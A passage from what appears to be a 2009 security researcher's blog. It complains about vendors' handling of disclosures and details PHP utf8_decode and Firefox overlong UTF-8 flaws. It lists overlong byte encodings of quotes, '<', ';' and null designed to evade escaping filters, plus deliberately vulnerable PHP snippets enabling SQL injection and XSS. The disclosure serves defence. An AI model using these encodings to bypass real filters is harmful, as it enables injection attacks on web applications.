So, we did stopped bothering him since then, and now there are a total of 14 vulnerabilities. This vulnerabilities are now private, because we think he won't fix them if we make them public (as he hasn't fixed the first ones). And we can't make them public, because thousands of users use OpenCart and they actually manage security sensitive information. (In this case I don't think full disclosure will work).

Knowing that Daniel Kerr has a bad history even with fully disclosed vulnerabilities, we are clueless on what to do. The best thing may be to urge everyone to stop using OpenCart as soon as possible.


So, paypal help center was vulnerable to a XSS for over 1 year, with a vulnerabilty that I reported to them 3 years ago.. and was only fixed because someone posted it on ( Since then, I felt it was not worth privately reporting stuff to them. But actually I didn't find any other vulnerabilities on paypal until recently.

So, today I found one, that is actually not really dangerous, requires the victim to be logged in on a place they probably wont be logged in.. And since full disclosure seems to be the only way to catch their attention, I did it.. and twitted about a clickjacking attack that allows you to send money to your account from a victim with 2 clicks.

Anyway, I don't think this can be abused in real life, but I do think it should be fixed, so after posting it on twitter, I waited a few hours and then reported it to paypal with a few suggestions on how to fix it. This is what I called reverse responsible disclosure.

What about Bob?

Well, I did found a XSS in a popular social network! but since they behaved cool in the past, I decided to report it privately, and let them fix it.. I may make it public when its fixed, but I don't think it's interesting enough (it's on the search engine.. They made a new version and missed to check for <> in JS strings).

So.. that's pretty much all.

What I think will happen now

1. The SMF guys will react and write me an email/comment/blogpost saying how an evil and unreasonable man I am.
2. Daniel Kerr from OpenCart will probably start trolling about this on email/his forum, without fixing any vulnerabilities whatsoever.
3. Paypal will fix this vulnerabilities, and say I was a bad guy.
4. Bob will fix the bug.

Soooo, that's all, I was really biting my tong on the opencart/smf responses.. And I am happy that I finally found a time to write about it.

And this is not intended to be used in the famous disclosure debate, or similar, is just a catharsis after dealing with this couple of lame vendors (except for bob, bob is cool, hi bob!).

Thanks for reading..

PS. I just noticed AdSense is showing Paypal ads on my site.. lol, that reminded me when the caesars palace twitter account retweeted how to hack their own wireless network.

Thursday, October 15, 2009

A couple of unicode issues on PHP and Firefox

Well, here I am developing ACS, finding that this project resembles at some degree the creation of a browser.. but anyway, it's close to a working beta (yay!).

In any case, a couple of bugs came to my attention, some of them are public, some of them are not.

First of all, I want to describe the PHP vulnerability I made public on my presentation with David Lindsay, at Blackhat USA 2009, that apparently only Chris Weber, Giorgio Maone (creator of NoScript), Mario Heiderich (creator of PHP-IDS) and the Acunetix security team have realized the danger of it.

It has been reported, well, more than enough times to the PHP team (I made another attempt today, hoping this will get fixed in some time soon.. if at all). This issue affects all PHP versions Mario Heiderich and me could test, and endangers practically all PHP programs that use the utf8_decode() function for decoding (as recommended by OWASP guidelines).

The disclosure timeline follows:
* Reported by May 11 2009
* Discovered by June 19 2009
* Discovered by Giorgio Maone / Eduardo Vela: July 14 2009
* Reported and Fixed on PHPIDS: July 14 2009
* Microsoft notified of a XSS Filter bypass: July 14 2009
* Fixed XSS Filter bypass on NoScript 1.9.6:  July 20 2009
* Vulnerability disclosed on BlackHat USA 2009: July 29 2009
* Added signature to Acunetix WVS: August 14 2009
* Re-reported by September 27 2009
* Vendor claims it was fixed on 5.2.11: September 29 2009
* Re-re-reported by after checking 5.2.11: October 16 2009
* Published October 16 2009

You can check the bug here:

In reality there are several vulns in just a couple of lines, so I'll describe them here:
1.- Overlong UTF-8:
As REQUIRED by UNICODE 3.1, and noted in the Unicode Technical Report #36, UTF-8 is forbidden to interpretate a character's non-shortest form.

VULN: PHP makes no checks whatsoever on this matter.

Why is this a vulnerability?

A filter (such as addslashes, htmlentities, escapeshellarg, etc.) will NOT be able to detect&escape such byte sequences, and so an application that relies on them for security checks wont be protected at all. Because it allows an attacker to encode "dangerous" chars, such as ', ", <, ;, &, \0 in different ways:

' = %27 = %c0%a7 = %e0%80%a7 = %f0%80%80%a7
" = %22 = %c0%a2 = %e0%80%a2 = %f0%80%80%a2
< = %3c = %c0%bc = %e0%80%bc = %f0%80%80%bc
; = %3b = %c0%bb = %e0%80%bb = %f0%80%80%bb
& = %26 = %c0%a6 = %e0%80%a6 = %f0%80%80%a6
\0= % 00 = %c0%80 = %e0%80%80 = %f0%80%80%80

Use hackvertor to generate them.

Enabling attacks on systems that use addslashes for example (but almost all encoding functions would be vulnerable):

// add slashes!
foreach($_GET as $k=>$v)$_GET[$k]=addslashes("$v");

//  .... some code ...

// $name is encoded in utf8
mysql_query("SELECT * FROM table WHERE name='$name';");


2.- Ill formed sequences:
As REQUIRED by UNICODE 3.0, and noted in the Unicode Technical Report #36, if a leading byte is followed by an invalid successor byte, then it should NOT consume it.

VULN: PHP will consume invalid bytes.

Why is this a vulnerability?

It will allow an attacker to "eat" controll chars. For example:

// htmlentities
foreach($_GET as $k=>$v)$_GET[$k]=htmlentities("$v",ENT_QUOTES);

//  ... some code ...


//  ... some code ...

$profileImage="<img alt=\"Photo of $name\" src=\"http://$url\" />";

// ... some code ...
echo utf8_decode($profileImage);

A request such as:


Will execute the code "alert(1)" when the page loads.

Note that htmlpurifier does a utf8_decode function call at the end of the decoding, BUT they are safe because of a pre-encoding made by htmlpurifier.. other codes that do the same wont be so lucky.

Bogdan Calin from Acunetix WVS described a couple of other potential attack scenarios:

Where an attacker could fool the filter by doing a request like:


Where an attacker could fool the filter by doing a request like:

3.- Integer overflow:
Unsigned short has a size of 16 bits (2 bytes), that is UNCAPABLE of storing unicode characters of 21 bits, and represented on UTF with 4 bytes (1111 0xxx 10xx xxxx 10xx xxxx 10xx xxxx). PHP attempts to sum a 21 bits value to a 16 bits-size variable, and then makes no checks on the value.

The affected code follows:

//  php/ext/xml/xml.c#558
PHPAPI char *xml_utf8_decode(    //  ...
    int pos = len;
    char *newbuf = emallo    //  ...
    unsigned short c;          // sizeof(unsigned short)==16 bits
    char (*decoder)(unsig    //  ...
    xml_encoding *enc = x    //  ...
//  ...
//  #580
    c = (unsigned char)(*s);
    if (c >= 0xf0) {         /* four bytes encoded, 21 bits */
        if(pos-4 >= 0) {
            c = ((s[0]&7)<<18) | ((s[1]&63)<<12) | ((s[2]&63)<<6) | (s[3]&63);
        } else {
            c = '?';   
        s += 4;
        pos -= 4;
//  ...

The relevant part of the code is of course, the declaration of c as an unsigned int, the comment specifing that the char is 21 bits, and this:
x= ((s[0]&7)<<18) | ...

s[0]&7<<18 means it will move 3 bits, 18 bits to the right. As we noted before.. c's size is only 16 bits.
(xxxx xxxx & 0000 0111) << 18

Also, this part:
...  ((s[1]&63)<<12) | ...

s[1]&63<<12 means it will move 6 bits, 12 bits to the right. So, 2 bits are going to be lost.
(xxxx xxxx & 0011 1111) << 12

This allows us to make something even more interesting.

Code like this:

%FF%F0%40%FC that is invalid unicode, overlong, and all you want (definatelly NOT valid), will be casted as a "lower than" simbol (<).

This besides the already mentioned problems, and the possibility of bypassing quite a lot of WAFs and Filters.. demonstrate the problem of a bad unicode implementation on PHP.

I hope the PHP development team acknowledges all this issues that have been reported before, and were explained some months ago on Blackhat USA (and the developers were noticed to check the ppt more than once), and now are explained yet another time.

This was fixed on 5.2.11 :) on my birthday!! Sept 17

Anyway.. that's not all, now to finish this post I want to publish a overlong utf-8 exception on Firefox (actually, Mozilla's).

The firefox one

Firefox is supposed to consider the non-shortest form exception (point #1 in the PHP vulnerabilities), and section 3.1 of the Unicode Technical Report #36 but apparently there's a flaw on it. This is specially problematic for the reasons that an overlong unicode sequence not taken into consideration may allow several types of filter bypasses.

Anyway, the severity of this vulnerability is not as high as the PHP ones, but is worth mentioning. The following non-shortest form for the char U+1000:
0xF0 0x81 0x80 0x80

is allowed, as well as the correct shortest form:
0xE1 0x80 0x80

Note that this problem is only present on the 4 bytes representation.

You can track this bug at:

Anyway, that's all! Thanks for your time :)